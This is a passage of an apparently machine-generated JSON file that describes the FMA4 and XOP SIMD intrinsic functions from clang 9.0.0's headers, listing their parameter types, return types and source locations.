"__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_maddsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:120:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_maddsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:126:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm_msubadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:132:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128" } }], "return-type": { "tag": "__m128" } }, { "tag": "function", "name": "_mm_msubadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:138:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128d" } }], "return-type": { "tag": "__m128d" } }, { "tag": "function", "name": "_mm256_macc_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:144:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_macc_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:150:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_msub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:156:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_msub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:162:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_nmacc_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:168:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_nmacc_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:174:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_nmsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:180:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_nmsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:186:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_maddsub_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:192:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_maddsub_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:198:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm256_msubadd_ps", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:204:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256" } }], "return-type": { "tag": "__m256" } }, { "tag": "function", "name": "_mm256_msubadd_pd", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/fma4intrin.h:210:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256d" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256d" } }], "return-type": { "tag": "__m256d" } }, { "tag": "function", "name": "_mm_maccs_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:24:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_macc_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:30:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maccsd_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:36:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maccd_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:42:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maccs_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:48:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_macc_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:54:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maccslo_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:60:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_macclo_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:66:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maccshi_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:72:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_macchi_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:78:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maddsd_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:84:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_maddd_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:90:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_haddw_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:96:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_haddd_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:102:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_haddq_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:108:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_haddd_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:114:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_haddq_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:120:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_haddq_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:126:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_haddw_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:132:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_haddd_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:138:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_haddq_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:144:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_haddd_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:150:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_haddq_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:156:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_haddq_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:162:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_hsubw_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:168:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_hsubd_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:174:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_hsubq_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:180:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_cmov_si128", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:186:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm256_cmov_si256", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:192:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m256i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m256i" } }], "return-type": { "tag": "__m256i" } }, { "tag": "function", "name": "_mm_perm_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:198:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__C", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_rot_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:204:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_rot_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:210:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_rot_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:216:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_rot_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:222:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_shl_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:240:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_shl_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:246:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_shl_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:252:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_shl_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:258:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sha_epi8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:264:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sha_epi16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:270:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sha_epi32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:276:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_sha_epi64", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:282:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comlt_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:329:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comle_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:335:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comgt_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:341:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comge_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:347:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comeq_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:353:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comneq_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:359:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comfalse_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:365:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comtrue_epu8", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:371:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comlt_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:377:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comle_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:383:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comgt_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:389:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comge_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:395:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comeq_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:401:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comneq_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:407:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comfalse_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:413:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comtrue_epu16", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:419:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comlt_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:425:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comle_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:431:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comgt_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:437:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comge_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:443:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comeq_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:449:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", "name": "__A", "type": { "tag": "__m128i" } }, { "tag": "parameter", "name": "__B", "type": { "tag": "__m128i" } }], "return-type": { "tag": "__m128i" } }, { "tag": "function", "name": "_mm_comneq_epu32", "ns": 0, "location": "/usr/lib/clang/9.0.0/include/xopintrin.h:455:1", "variadic": false, "inline": true, "storage-class": "static", "parameters": [{ "tag": "parameter", 